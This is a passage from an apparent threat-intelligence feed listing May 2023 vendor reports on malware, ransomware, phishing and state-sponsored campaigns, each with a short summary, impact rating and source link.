Source: https://blog.cyble.com/2023/05/25/invicta-stealer-spreading-through-phony-godaddy-refund-invoices/

Intel Source:: Cyble

Intel Name:: Ducktail_Malware_targets_a_high_profile_accounts

Date of Scan:: 2023-05-30

Impact:: LOW

Summary:: Recently Cyble researchers recently discovered Ducktail malware that targets specifically Marketing and HR professionals. The malware is designed to extract browser cookies and take advantage of social media sessions to steal sensitive information from the victim’s Social Media account. The malware operation purpose is to gain control of Social Media Business accounts with adequate access privileges. TAs then use their acquired access to conduct advertisements for their financial gain.

Source: https://blog.cyble.com/2023/05/17/ducktail-malware-focuses-on-targeting-hr-and-marketing-professionals/

Intel Source:: CADO Security

Intel Name:: Legion_Malware_Targeting_SSH_Servers_and_AWS_Credentials

Date of Scan:: 2023-05-29

Impact:: LOW

Summary:: CADO security researchers have identified an updated version of the commodity malware called Legion comes with expanded features to compromise SSH servers and Amazon Web Services (AWS) credentials associated with DynamoDB and CloudWatch.

Source: https://www.cadosecurity.com/updates-to-legion-a-cloud-credential-harvester-and-smtp-hijacker/

Intel Source:: Sentinelone

Intel Name:: Hackers_Targeting_Users_of_Portuguese_Financial_Institutions

Date of Scan:: 2023-05-29

Impact:: MEDIUM

Summary:: SentinelOne researchers have observed a campaign targeting users of Portuguese financial institutions conducted by a Brazilian threat group. The attackers can steal credentials and exfiltrate users’ data and personal information, which can be leveraged for malicious activities beyond financial gain.

Source: https://www.sentinelone.com/labs/operation-magalenha-long-running-campaign-pursues-portuguese-credentials-and-pii/

Intel Source:: Trustwave

Intel Name:: Phishing_Delivering_via_Encrypted_Messages

Date of Scan:: 2023-05-28

Impact:: MEDIUM

Summary:: Trustwave researchers have observed phishing attacks that use a combination of compromised Microsoft 365 accounts and .rpmsg encrypted emails to deliver the phishing message.

Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-encrypted-restricted-permission-messages-deliver-phishing/

Intel Source:: Mandiant

Intel Name:: COSMICENERGY_new_OT_Malware_related_to_Russia

Date of Scan:: 2023-05-27

Impact:: MEDIUM

Summary:: Mandiant discovered a new operational technology (OT) / industrial control system (ICS) malware, which was recognized as COSMICENERGY, uploaded by threat actor in Russia. The malware is capable of to cause electric power disruption by interacting with IEC 60870-5-104 (IEC-104) devices, such as remote terminal units (RTUs), that are commonly leveraged in electric transmission and distribution operations in Europe, the Middle East, and Asia.

Source: https://www.mandiant.com/resources/blog/cosmicenergy-ot-malware-russian-response

Intel Source:: Cyble

Intel Name:: Cyber_Crime_Forum_Offers_DDoS_As_A_Service_by_Russian_Hacktivists

Date of Scan:: 2023-05-27

Impact:: LOW

Summary:: Cyble Research and Intelligence Labs (CRIL) has made a significant discovery on a cybercrime forum - a newly identified malware strain called "MDBotnet." Our analysis suggests that this malware is believed to originate from a Threat Actor (TA) linked to Russia.

Source: https://blog.cyble.com/2023/05/23/new-mdbotnet-unleashes-ddos-attacks/

Intel Source:: ClearSky

Intel Name:: Israeli_Logistics_Industry_targeted_by_hackers

Date of Scan:: 2023-05-27

Impact:: LOW

Summary:: ClearSky Cyber Security reserachers has discovered a watering hole attack on at least eight Israeli websites. The attack most likely was orchestrated by a nation-state actor from Iran, with some attribution to Tortoiseshell (also called TA456 or Imperial Kitten). The Infected sites collect preliminary user information through a script.

Source: https://www.clearskysec.com/fata-morgana/

Intel Source:: ClearSky

Intel Name:: Israeli_Logistics_Industry_attacked_by_hackers

Date of Scan:: 2023-05-27

Impact:: LOW

Summary:: ClearSky Cyber Security reserachers has discovered a watering hole attack on at least eight Israeli websites. The attack most likely was orchestrated by a nation-state actor from Iran, with some attribution to Tortoiseshell (also called TA456 or Imperial Kitten). The Infected sites collect preliminary user information through a script. W

Source: https://www.clearskysec.com/fata-morgana/

Intel Source:: ASEC

Intel Name:: Link_Found_Between_Korean_VPN_Installations_and_MeshAgent_Infections

Date of Scan:: 2023-05-27

Impact:: LOW

Summary:: AhnLab Security Emergency response Center (ASEC) has previously covered the case where SparkRAT was distributed contained within a Korean VPN’s installer in the post, “SparkRAT Being Distributed Within a Korean VPN Installer”[1]. This VPN was commonly installed by Chinese users who required better access to the Internet, and the problem was addressed after the blog post was uploaded.

Source: https://asec.ahnlab.com/en/53267/

Intel Source:: Sentilone

Intel Name:: Ongoing_Kimsuky_Campaign_Utilizing_Custom_Reconnaissance_Toolkit

Date of Scan:: 2023-05-27

Impact:: MEDIUM

Summary:: SentinelLabs have tracking a targeted campaign against information services, as well as organizations supporting human rights activists and defectors in relation to North Korea. The campaign focuses on file reconnaissance, and exfiltrating system and hardware information, laying the groundwork for subsequent precision attacks.

Source: https://www.sentinelone.com/labs/kimsuky-ongoing-campaign-using-tailored-reconnaissance-toolkit/

Intel Source:: Microsoft, CISA

Intel Name:: Volt_Typhoon_stealthy_activity

Date of Scan:: 2023-05-27

Impact:: HIGH

Summary:: Microsoft has discovered sneaky and malicious activity that targets on credential access and network system discovery attacking critical infrastructure organizations in the United States. The attack is carried out by Volt Typhoon, a state-sponsored actor based in China that focuses on espionage and information stealing. Microsoft is sure that this Volt Typhoon campaign is targeting development of capabilities that could disrupt critical communications infrastructure between the United States and Asia region during future crises.

Source: https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/

Intel Source:: Cyble

Intel Name:: Over_200_Corporate_Victims_Hit_by_New_Ransomware_Wave

Date of Scan:: 2023-05-27

Impact:: LOW

Summary:: Cyble Research and Intelligence Labs (CRIL) discovered the increasing adoption of double extortion by ransomware groups is an alarming trend. We are witnessing a surge in ransomware attacks that not only encrypt valuable corporate data but also involve the threat of public exposure unless the attackers' demands are fulfilled.

Source: https://blog.cyble.com/2023/05/23/new-ransomware-wave-engulfs-over-200-corporate-victims/

Intel Source:: Zscaler

Intel Name:: The_Technical_Examination_of_Pikabot

Date of Scan:: 2023-05-27

Impact:: LOW

Summary:: Researchers from Zscaler have identified a new malware trojan named Pikabot which emerged in early 2023 that consists of two components a loader and a core module.

Source: https://www.zscaler.com/blogs/security-research/technical-analysis-pikabot

Intel Source:: Checkpoint

Intel Name:: Agrius_threat_actor_attacks_against_Israel

Date of Scan:: 2023-05-27

Impact:: MEDIUM

Summary:: A threat actor Agrius who is believed Iranian keep trying to attack against Israeli targets, hiding destructive impact of ransomware attacks.Recently the group deployed Moneybird, a new ransomware written in C++. Despite calling themselves as a new group name– Moneybird, this is yet another Agrius alias.

Source: https://research.checkpoint.com/2023/agrius-deploys-moneybird-in-targeted-attacks-against-israeli-organizations/

Intel Source:: Cofense

Intel Name:: Resurgence_of_Vacation_Request_Phishing_Emails_in_Summer_Time_Scams

Date of Scan:: 2023-05-27

Impact:: LOW

Summary:: Cofense researchers have observed a phishing campaign where the threat actor sent an email to a user that claimed to be from the HR Department’ and provided the user with a link to submit their annual leave requests.

Source: https://cofense.com/blog/summer-time-scams-the-return-of-vacation-request-phishing-emails/

Intel Source:: Cluster25

Intel Name:: Return_of_BlackByte_Ransomware_with_New_Technology_Version

Date of Scan:: 2023-05-27

Impact:: LOW

Summary:: Cluster25 Threat Intel Team have identified that BlackByte is a Ransomware-as-a-Service group that is known for the use of the homonymous malware that is constantly updated and spread in different variants. The team used the above function in a IDAPython script that allowed to retrieve all invocations to the functions responsible for the dynamic loading of the APIs in order to continue with the static analysis of the malware.

Source: https://blog.cluster25.duskrise.com/2023/05/22/back-in-black-blackbyte-nt

Intel Source:: Sekoia

Intel Name:: Raccoon_and_Vidar_Stealers_Spreading_Fake_Cracked_Software

Date of Scan:: 2023-05-26

Impact:: MEDIUM

Summary:: Sekoia researchers have identified the infection chain that is using about a hundred fake cracked software catalog websites that redirect to several links before downloading the payload hosted on file share platforms, such as GitHub.

Source: https://blog.sekoia.io/unveiling-of-a-large-resilient-infrastructure-distributing-information-stealers/

Intel Source:: CERT-UA

Intel Name:: Espionage_Activity_UAC_0063

Date of Scan:: 2023-05-26

Impact:: LOW

Summary:: CERT-UA researchers have observed that on 04/18/2023 and 04/20/2023, e-mails were sent to the department's e-mail address from the official mailbox of the Embassy of Tajikistan in Ukraine (probably as a result of the latter being compromised), the first of which contained an attachment in the form of a document with a macro, and the second - reference to the same document.

Source: https://cert.gov.ua/article/4697016

Intel Source:: ASEC

Intel Name:: Lazarus_Group_Targeting_Windows_IIS_Web_Servers

Date of Scan:: 2023-05-26

Impact:: LOW

Summary:: ASEC researchers have identified that the Lazarus group is known to receive support on a national scale, carrying out attacks against Windows IIS web servers.

Source: https://asec.ahnlab.com/en/53132/

Intel Source:: Securelist

Intel Name:: Diving_Deep_into_GoldenJackal_APT_Group

Date of Scan:: 2023-05-26

Impact:: LOW

Summary:: Securelist researchers have monitored the GoldenJackal APT Group since mid-2020 and have observed a constant level of activity that indicates a capable and stealthy actor. The main feature of this group is a specific toolset of .NET malware, JackalControl, JackalWorm, JackalSteal, JackalPerInfo, and JackalScreenWatcher.

Source: https://securelist.com/goldenjackal-apt-group/109677/

Intel Source:: ASEC

Intel Name:: StrelaStealer_Malware_Targeting_Spanish_Users

Date of Scan:: 2023-05-26

Impact:: LOW

Summary:: ASEC researchers have observed that the StrelaStealer Infostealer is distributed to Spanish users. It was initially discovered around November 2022 and distributed as an attachment to spam emails.

Source: https://asec.ahnlab.com/en/53158/

Intel Source:: ASEC

Intel Name:: Distribution_of_DarkCloud_Infostealer_Through_Spam_Emails

Date of Scan:: 2023-05-26

Impact:: LOW

Summary:: ASEC researchers have discovered the DarkCloud malware is distributed via spam email. It is an Infostealer that steals account credentials saved on infected systems, and the threat actor installed ClipBanker alongside DarkCloud.

Source: https://asec.ahnlab.com/en/53128/

Intel Source:: Checkpoint

Intel Name:: Distribution_of_DarkCloud_Infostealer_Through_Spam_Emails_Detected

Date of Scan:: 2023-05-26

Impact:: LOW

Summary:: Checkpoint researchers have identified that malware developers strive to create new threats that can bypass the defenses of antivirus products. “Packing” and “crypting” services are specifically designed to resist analysis. GuLoader is one of the most prominent services cybercriminals use to evade antivirus detection.

Source: https://research.checkpoint.com/2023/cloud-based-malware-delivery-the-evolution-of-guloader/

Intel Source:: Fortinet

Intel Name:: Middle_East_Targeted_by_New_Kernel_Driver_Exploit

Date of Scan:: 2023-05-24

Impact:: LOW

Summary:: Fortinet researchers have discovered suspicious executables that make use of open-source tools and frameworks. One of the things that we keep an eye out for is tools that use the Donut project. Donut is a position-independent shellcode that loads .NET Assemblies, PE files, and other Windows payloads from memory and runs them with parameters.

Source: https://www.fortinet.com/blog/threat-research/wintapix-kernal-driver-middle-east-countries

Intel Source:: DFIR Report

Intel Name:: IcedID_Macro_Ends_in_Nokoyawa_Ransomware

Date of Scan:: 2023-05-22

Impact:: LOW

Summary:: Researchers from DFIR Report have identified an incident taking place during Q4 of 2022 consisting of threat actors targeting Italian organizations with Excel maldocs that deploy IcedID. The threat actors deploying such a campaign may hope to target organizations who have not updated their Microsoft Office deployments after the newly released patches to block macros on documents downloaded from the internet.

Source: https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/

Intel Source:: Esentire

Intel Name:: BatLoader_Campaign_Impersonates_ChatGPT_and_Midjourney_to_Deliver_Redline_Stealer

Date of Scan:: 2023-05-22

Impact:: LOW

Summary:: Esentire researchers have observed threat actors are using BatLoader in the form of MSIX Windows App Installer files to deliver the Redline Stealer.

Source: https://www.esentire.com/blog/batloader-impersonates-midjourney-chatgpt-in-drive-by-cyberattacks

Intel Source:: TrendMicro

Intel Name:: New_Signed_Kernel_Driver_Deployed_BlackCat_Ransomware

Date of Scan:: 2023-05-22

Impact:: MEDIUM

Summary:: TrendMicro researchers have analyzed the BlackCat ransomware incident that occurred in February 2023, where they observed a new capability, mainly used for the defense evasion phase, that overlaps with the earlier malicious drivers disclosed by the three vendors.

Source: https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html

Intel Source:: Wordfence

Intel Name:: Hackers_Targeting_Vulnerable_WordPress_Elementor_plugin_Versions

Date of Scan:: 2023-05-22

Impact:: LOW

Summary:: Wordfence researchers have identified Several versions of the WordPress plugin Essential Addons for Elementor impacted by the now-addressed critical CVE-2023-32243 vulnerability are being actively scanned and targeted by threat actors following the release of proof-of-concept exploit.

Source: https://www.wordfence.com/blog/2023/05/psa-attackers-actively-exploiting-critical-vulnerability-in-essential-addons-for-elementor/

Intel Source:: Sophos

Intel Name:: Brute_Ratel_remains_rare_and_targeted

Date of Scan:: 2023-05-19

Impact:: LOW

Summary:: The commercial attack tool’s use by threat actors has faded after an initial flurry, while Cobalt Strike remains the go-to post-exploitation tool for many.

Source: https://news.sophos.com/en-us/2023/05/18/the-phantom-menace-brute-ratel-remains-rare-and-targeted/

Intel Source:: Reversing Labs

Intel Name:: TurkoRat_found_hiding_in_the_npm_package

Date of Scan:: 2023-05-19

Impact:: LOW

Summary:: ReversingLabs researchers found two malicious packages that contained TurkoRat, an open source infostealer that lurked on npm for two months before being detected.

Source: https://www.reversinglabs.com/blog/rats-found-hiding-in-the-npm-attic

Intel Source:: Cyble

Intel Name:: CapCut_s_Video_to_Deliver_Multiple_Stealers

Date of Scan:: 2023-05-19

Impact:: LOW

Summary:: Cyble Researchers recently discovered a couple of phishing websites disguised as video editing software. These ffake sites lure users into downloading and executing various types of malware families such as stealers, RAT, etc. In these campaigns, Threat Actors targeted the CapCut video editing tool, a product of ByteDance, the same parent company that owns TikTok.

Source: https://blog.cyble.com/2023/05/19/capcut-users-under-fire/

Intel Source:: Cyble

Intel Name:: AndoryuBot_s_DDOS_wild_behavior

Date of Scan:: 2023-05-19

Impact:: LOW

Summary:: The Cyble group observed active exploitation of CVE-2023-25717 and deployment of AndoryuBot. This incident indicates that Threat Actors are actively looking for vulnerable Ruckus assets for exploitation purposes. AndoryuBot is a new Botnet malware sold on Telegram on a subscription basis. The deployment of such malware by TAs allows them to orchestrate large-scale DDoS attacks, which can overwhelm targeted servers and infrastructure by flooding them with a massive volume of traffic.

Source: https://blog.cyble.com/2023/05/17/andoryubots-ddos-rampage/

Intel Source:: Bushidotoken

Intel Name:: Distributing_DarkCrystal_RAT_by_fake_Desktop_Authenticator_App

Date of Scan:: 2023-05-19

Impact:: LOW

Summary:: The Bushitoken reseracher recently discovered an threat actor campaign that is using fake websites to distribute malware. It seems like this TTP to be on the rise. A suspected Russia-based threat actor tried to duplicate the website of a legitimate open-source desktop app called Steam Desktop Authenticator which is simply a convenient desktop version of the mobile authenticator app.

Source: https://blog.bushidotoken.net/2023/05/fake-steam-desktop-authenticator-app.html

Intel Source:: ASEC

Intel Name:: The_Korean_VPN_installer_is_being_used_to_distribute_SparkRAT

Date of Scan:: 2023-05-18

Impact:: MEDIUM

Summary:: AhnLab Security Emergency response Center (ASEC) has recently discovered SparkRAT being distributed within the installer of a certain VPN program. SparkRAT is a Remote Administration Tool (RAT) developed with GoLang. When installed on a user’s system, it can perform a variety of malicious behaviors, such as executing commands remotely, controlling files and processes, downloading additional payloads, and collecting information from the infected system like by taking screenshots.

Source: https://asec.ahnlab.com/en/52899/

Intel Source:: Cofense

Intel Name:: The_attackers_used_email_security_providers_for_spreading_phishing_attacks

Date of Scan:: 2023-05-18

Impact:: LOW

Summary:: Threat actors more often send malicious URLs within HTML attachments, which makes it more challenging for Secure Email gateways (SEGs) to block them. The Phishing Defence Centre did their analyses on a phishing campaign impersonating email security provider to trap recipients into providing their user credentials via malicious HTML attachment.

Source: https://cofense.com/blog/threat-actors-impersonate-email-security-providers-to-steal-user-credentials/

Intel Source:: Team Cymru

Intel Name:: The_analysis_of_QakBot_Infrastructure

Date of Scan:: 2023-05-18

Impact:: MEDIUM

Summary:: Team Cymru shared their research about their analysis of QakBot is full of various hypotheses being identified and tested. Their key findings are QakBot C2 servers are not separated by affiliate ID, QakBot C2 servers from older configurations continue to communicate with upstream C2 servers months after being used in campaigns and Identification of three upstream C2 servers located in Russia, two of which behave similarly based on network telemetry patterns and the geolocations of the bot C2s communicating with them.

Source: https://www.team-cymru.com/post/visualizing-qakbot-infrastructure

Intel Source:: Cyble

Intel Name:: BlackSuit_Ransomware_ragets_VMware_ESXi_servers

Date of Scan:: 2023-05-18

Impact:: HIGH

Summary:: Cyble researchers from Labs observed an increase in the number of ransomware groups such as Cylance and Royal ransomware. The widespread use of Linux makes it an appealing target for ransomware groups, as a single attack can potentially compromise numerous systems.

Source: https://blog.cyble.com/2023/05/12/blacksuit-ransomware-strikes-windows-and-linux-users/

Intel Source:: CISA

Intel Name:: Joint_Cybersecurity_Advisory_on_BianLian_Ransomware_Group

Date of Scan:: 2023-05-18

Impact:: MEDIUM

Summary:: The FBI, CISA and Australian Cyber Security Centre (ACSC) released the joint Cybersecurity Advisory to disseminate known BianLian ransomware and data extortion group IOCs and TTPs identified through FBI and ACSC investigations back in March 2023. BianLian is a ransomware developer, deployer, and data extortion cybercriminal group that has targeted organizations in multiple U.S. critical infrastructure sectors since June 2022. They have also targeted Australian critical infrastructure sectors in addition to professional services and property development.

Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-136a

Intel Source:: Wordfence

Intel Name:: The_exploitation_of_critical_vulnerability_CVE_2023_32243

Date of Scan:: 2023-05-18

Impact:: HIGH

Summary:: Recently, Essential Addons for Elementor, a WordPress plugin had a released a patch for a critical vulnerability which is capable for any unauthenticated user to reset arbitrary user passwords, including user accounts with administrative-level access. This vulnerability was discovered and responsibly disclosed by security researcher Rafie Muhammed.

Source: https://www.wordfence.com/blog/2023/05/psa-attackers-actively-exploiting-critical-vulnerability-in-essential-addons-for-elementor/

Intel Source:: TrendMicro

Intel Name:: New_8220_Gang_Strategies

Date of Scan:: 2023-05-17

Impact:: MEDIUM

Summary:: Reserachers documentedon the gang’s recent activities of 8220 Gang who has been active in recent months. Researchers shared in their article aboutk observed attack exploiting the Oracle WebLogic vulnerability CVE-2017-3506 captured by one of our honeypots. This vulnerability, with a CVSS score of 7.4, impacts the WLS Security Component of Oracle WebLogic, and when exploited can enable attackers to execute arbitrary commands through an HTTP request remotely with a specifically crafted XML document.

Source: https://www.trendmicro.com/en_us/research/23/e/8220-gang-evolution-new-strategies-adapted.html

Intel Source:: Malwarebytes

Intel Name:: Uncovering_RedStinger_new

Date of Scan:: 2023-05-17

Impact:: MEDIUM

Summary:: During the conflict between Russia and Ukraine began last year, there is a not only political conflict, there is no surprise that the cybersecurity landscape between these two countries has also been tense. The former reseracher from Malwarebytes Threat Intelligence Team discovered a new interesting bait that targeted the Eastern Ukraine region and reported that finding to the public and tracked this actor as Red Stinger. These findings remained private for a while, but Kaspersky recently shared information about the same actor (who it called Bad Magic).

Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/05/redstinger

Intel Source:: Fortinet

Intel Name:: Malicious_Python_Packages_via_Supply_Chain_Attacks

Date of Scan:: 2023-05-17

Impact:: MEDIUM

Summary:: The FortiGuard Labs team discovered over 30 new zero-day attacks in PyPI packages (Python Package Index). These were found between late March and late April by monitoring an open-source ecosystem.

Source: https://www.fortinet.com/blog/threat-research/more-supply-chain-attacks-via-malicious-python-packages?&web_view=true

Intel Source:: TrendMicro

Intel Name:: The_Water_Orthrus_s_New_Campaigns

Date of Scan:: 2023-05-17

Impact:: MEDIUM

Summary:: TrendMicro researchers have been monitoring the activities of a threat actor named Water Orthrus, which spreaded CopperStealer malware via pay-per-install (PPI) networks. In March 2023, we observed two campaigns delivering new malware that we named CopperStealth and CopperPhish. Both malware have characteristics that are close to those of CopperStealer and are likely developed by the same author, leading the researchers believe that these campaigns are likely Water Orthrus’ new activities.

Source: https://www.trendmicro.com/en_us/research/23/e/water-orthrus-new-campaigns-deliver-rootkit-and-phishing-modules.html?&web_view=true

Intel Source:: Symantec

Intel Name:: The_Lancefly_APT_group_using_Merdoor_backdoor

Date of Scan:: 2023-05-17

Impact:: MEDIUM

Summary:: The Lancefly (APT) group is attacking and target organizations in South and Southeast Asiausing with a custom-written backdoor. Lancefly’s custom malware is named Merdoor, is a powerful backdoor that existed since 2018. The recent targets lately are based in South and Southeast Asia, attacking areas including government, aviation, education, and telecoms. Symantec researchers observed that activity also appeared to be highly targeted, with only a small number of machines infected.

Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lancefly-merdoor-zxshell-custom-backdoor?web_view=true

Intel Source:: Cyble

Intel Name:: An_In_Depth_Look_at_Akira_Ransomware

Date of Scan:: 2023-05-16

Impact:: MEDIUM

Summary:: Cyble researchers have come across a Reddit post about a new ransomware variant named “Akira”, actively targeting numerous organizations and exposing their sensitive data. To increase the chances of payment from victims, Akira ransomware exfiltrates and encrypts their data using a double-extortion technique. The attackers then threaten to sell or leak the stolen data on the dark web if the ransom is not paid for decrypting the data.

Source: https://blog.cyble.com/2023/05/10/unraveling-akira-ransomware/

Intel Source:: ASEC

Intel Name:: LokiLocker_Ransomware_Distributed_in_Korea

Date of Scan:: 2023-05-16

Impact:: MEDIUM

Summary:: AhnLab Security Emergency response Center(ASEC) has confirmed the distribution of the LokiLocker ransomware in Korea. This ransomware is almost identical to the BlackBit ransomware and their common traits

Source: https://asec.ahnlab.com/en/52570/

Intel Source:: Securonix

Intel Name:: Ongoing_Phishing_Campaign_uses_Meme_Filled_Code_to_Drop_XWorm_Payloads

Date of Scan:: 2023-05-16

Impact:: MEDIUM

Summary:: Last couple months was observed an interesting and ongoing attack campaign which was identified and tracked by the Securonix Threat Research team. The attack campaign (tracked by Securonix as MEME#4CHAN) was leveraging rather unusual meme-filled PowerShell code, followed by a heavily obfuscated XWorm payload to infect its victims. Securonix dived into this campaign by taking an in-depth technical analysis.

Source: https://www.securonix.com/blog/securonix-threat-labs-security-meme4chan-advisory/

Intel Source:: Cyble

Intel Name:: A_new_ransomware_variant_Rancoz

Date of Scan:: 2023-05-16

Impact:: LOW

Summary:: This month Cyble researchers onserved a ransomware variant called Rancoz, that was identified by a researcher @siri_urz. During the investigation, it has been observed that this ransomware is similar and overlaps with the Vice Society ransomware.

Source: https://blog.cyble.com/2023/05/11/dissecting-rancoz-ransomware/

Intel Source:: Malwarebytes

Intel Name:: Eastern_European_APT_Cyber_Operations_Undetected_Since_2020

Date of Scan:: 2023-05-16

Impact:: LOW

Summary:: Malwarebytes researchers have discovered a new interesting lure that targeted the Eastern Ukraine region and reported that finding to the public. Moreover, we started tracking the actor behind it, which we internally codenamed Red Stinger.

Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/05/redstinger

Intel Source:: Malware Bytes

Intel Name:: The_Aurora_stealer_via_Invalid_Printer_loader

Date of Scan:: 2023-05-16

Impact:: LOW

Summary:: Malware Bytes Lab shared their discovery about this malicious campaing and its connections to other attacks. They discovered that a threat actor was using malicious ads to redirect users to what looks like a Windows security update. The scheme looked very legit ans very much resembled what you'd expect from Microsoft. That fake security update was using a newly identified loader that at the time of the campaign was oblivious to malware sandboxes and bypassed practically all antivirus engines. Malware Bytes Lab tool patched that loader and identified its actual payload as Aurora stealer.

Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/05/fake-system-update-drops-new-highly-evasive-loader

Intel Source:: Fortinet

Intel Name:: Maori_Ransomware

Date of Scan:: 2023-05-16

Impact:: MEDIUM

Summary:: FortiGuard Labs recently came across a new ransomware variant called Maori. Like other ransomware variants, it encrypts files on victims’ machines to extort money. Interestingly, this variant is designed to run on Linux architecture and is coded in Go, which is somewhat rare and increases the analysis difficulty

Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-maori?&web_view=true

Intel Source:: Deep Instinct Blog

Intel Name:: A_new_undetected_variant_of_Linux_Backdoor_BPFDoor

Date of Scan:: 2023-05-15

Impact:: MEDIUM

Summary:: BPFdoor is a Linux-specific, low-profile, passive backdoor intended to maintain a persistent, long-term foothold in already-breached networks and environments and functions primarily to ensure an attacker can re-enter an infected system over an extended period of time, post-compromise.

Source: https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game

Intel Source:: Mcafee

Intel Name:: Analysis_of_a_evasive_Shellcode

Date of Scan:: 2023-05-14

Impact:: LOW

Summary:: McAfee researchers have observed a NSIS-based installers delivered via E-mail as malspam that use plugin libraries to execute the GU shellcode on the victim system

Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/guloader-campaigns-a-deep-dive-analysis-of-a-highly-evasive-shellcode-based-loader/?&web_view=true

Intel Source:: CISA

Intel Name:: Exploitation_of_CVE_2023_27350

Date of Scan:: 2023-05-14

Impact:: LOW

Summary:: The Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) in response to the active exploitation of CVE-2023-27350. This vulnerability occurs in certain versions of PaperCut NG and PaperCut MF and enables an unauthenticated actor to execute malicious code remotely without credentials.

Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-131a

Intel Source:: ASEC

Intel Name:: ASEC_Weekly_Statistics_May_1_7th_2023

Date of Scan:: 2023-05-13

Impact:: LOW

Summary:: ASEC lab researchers continiusly monitor phishing email threats with the ASEC automatic sample analysis system (RAPIT) and honeypot. Their post shares the cases of distribution of phishing emails during the week from April 9th, 2023 to April 15st, 2023 and provide statistical information on each type.

Source: https://asec.ahnlab.com/en/52488/

Intel Source:: Dragos

Intel Name:: A_cybercriminal_group_attempted_an_extortion_scheme_against_Dragos

Date of Scan:: 2023-05-13

Impact:: LOW

Summary:: Last week, an known hacker group tried and didn't have a success at an extortion scheme against Dragos. Nothing was breached at Dragos systems, including anything related to the Dragos Platform. Dragos has shared what happened during a recent incident of failed extortion scheme against them - Dragos. The cybercriminal group attempted to compromise Drago's information resources. The criminal group got access by compromising the personal email address of a new sales employee prior to their start date, and subsequently used their personal information to impersonate the Dragos employee and accomplish initial steps in the employee onboarding process.

Source: https://www.dragos.com/blog/deconstructing-a-cybersecurity-event/

Intel Source:: Sentinelone

Intel Name:: Threat_Actors_Build_ESXi_Lockers_Using_Leaked_Babuk_Code

Date of Scan:: 2023-05-13

Impact:: MEDIUM

Summary:: SentinelLabs researchers have identified unexpected connections between ESXi ransomware families, exposing likely relationships between Babuk and more illustrious operations like Conti and REvil.

Source: https://www.sentinelone.com/labs/hypervisor-ransomware-multiple-threat-actor-groups-hop-on-leaked-babuk-code-to-build-esxi-lockers/

Intel Source:: Fortinet

Intel Name:: An_Expansion_of_RapperBot_DDoS_Botnet_into_Cryptojacking

Date of Scan:: 2023-05-12

Impact:: LOW

Summary:: FortiGate researchers have analyzed new samples of the RapperBot campaign active since January 2023. The threat actors have started venturing into cryptojacking, specifically for Intel x64 machines. Initially, they deployed and executed a separate Monero cryptominer alongside the usual RapperBot binary. But in late January 2023, they combined both functionalities into a single bot.

Source: https://www.fortinet.com/blog/threat-research/rapperbot-ddos-botnet-expands-into-cryptojacking

Intel Source:: Cert-PL

Intel Name:: Malspam_Campaign_Delivering_PowerDash

Date of Scan:: 2023-05-12

Impact:: LOW

Summary:: CERT-PL researchers have observed a malspam campaign delivering previously unseen PowerShell malware. They also dubbed this malware family as "PowerDash" because of the "/dash" path on C2 server, used as a gateway for bots.

Source: https://cert.pl/en/posts/2023/05/powerdash-malspam/

Intel Source:: ASEC

Intel Name:: CLR_SqlShell_malware_Attack_MS_SQL_Servers

Date of Scan:: 2023-05-12

Impact:: MEDIUM

Summary:: ASEC analyzed the CLR SqlShell malware that is being used to target MS-SQL servers. Similar to WebShell, which can be installed on web servers, SqlShell is a malware strain that supports various features after being installed on an MS-SQL server, such as executing commands from threat actors and carrying out all sorts of malicious behavior.

Source: https://asec.ahnlab.com/en/52479/

Intel Source:: Mcafee

Intel Name:: The_Examination_of_Highly_Evasive_Shellcode_Based_Loader

Date of Scan:: 2023-05-12

Impact:: LOW

Summary:: McAfee researchers have deeply analyzed the GULoader campaigns and found, a rise in NSIS-based installers delivered via E-mail as malspam that use plugin libraries to execute the GU shellcode on the victim system.

Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/guloader-campaigns-a-deep-dive-analysis-of-a-highly-evasive-shellcode-based-loader/

Intel Source:: Bitdefender

Intel Name:: DownEx_Espionage_activity_in_Central_Asia

Date of Scan:: 2023-05-12

Impact:: MEDIUM

Summary:: Last year Bitdefender Labs reserchers observed an attack on foreign government institutions in Kazakhstan. During the analyses, it was disovered that this was a highly targeted attack to get an access to exfiltrate data. Bitdefender Labs reserchers did moitored for awhile it and the region for other similar attacks. Recently they detected another attack in Afghanistan and collected additional samples and observations.

Source: https://www.bitdefender.com/blog/businessinsights/deep-dive-into-downex-espionage-operation-in-central-asia/

Intel Source:: Cofense

Intel Name:: MitM_Phishing_Growing_and_Using_Real_Login_Process_to_Steal_Credentials

Date of Scan:: 2023-05-10

Impact:: LOW

Summary:: Cofense researchers have observed Man-in-the-middle attacks are increasing rapidly and identified a 35% increase in volume reaching inboxes between Q1 2022 and Q1 2023, 94% of MitM credential phishing attacks reaching inboxes targeted O365 authentication, and 89% of campaigns used at least one URL redirect, and 55% used two or more.

Source: https://cofense.com/blog/cofense-intelligence-strategic-analysis-2/

Intel Source:: PaloAlto

Intel Name:: Royal_Ransomware_Expands_to_Target_Linux_and_VMware_ESXi

Date of Scan:: 2023-05-10

Impact:: MEDIUM

Summary:: PaloAlto researchers have observed that the Royal ransomware group has recently launched a variant of its encryptor malware built in the form of executable and linkable format (ELF) binary. Also, they started using the BatLoader dropper and SEO poisoning for initial access.

Source: https://unit42.paloaltonetworks.com/royal-ransomware/

Intel Source:: Abnormal

Intel Name:: Taking_a_Closer_Look_at_Israel_Based_BEC_Attacks

Date of Scan:: 2023-05-10

Impact:: HIGH

Summary:: Researchers from Abnormal Security have discovered that an Israel-based threat group has conducted 350 BEC campaigns since February 2021, with email attacks targeting employees from 61 countries across six continents.

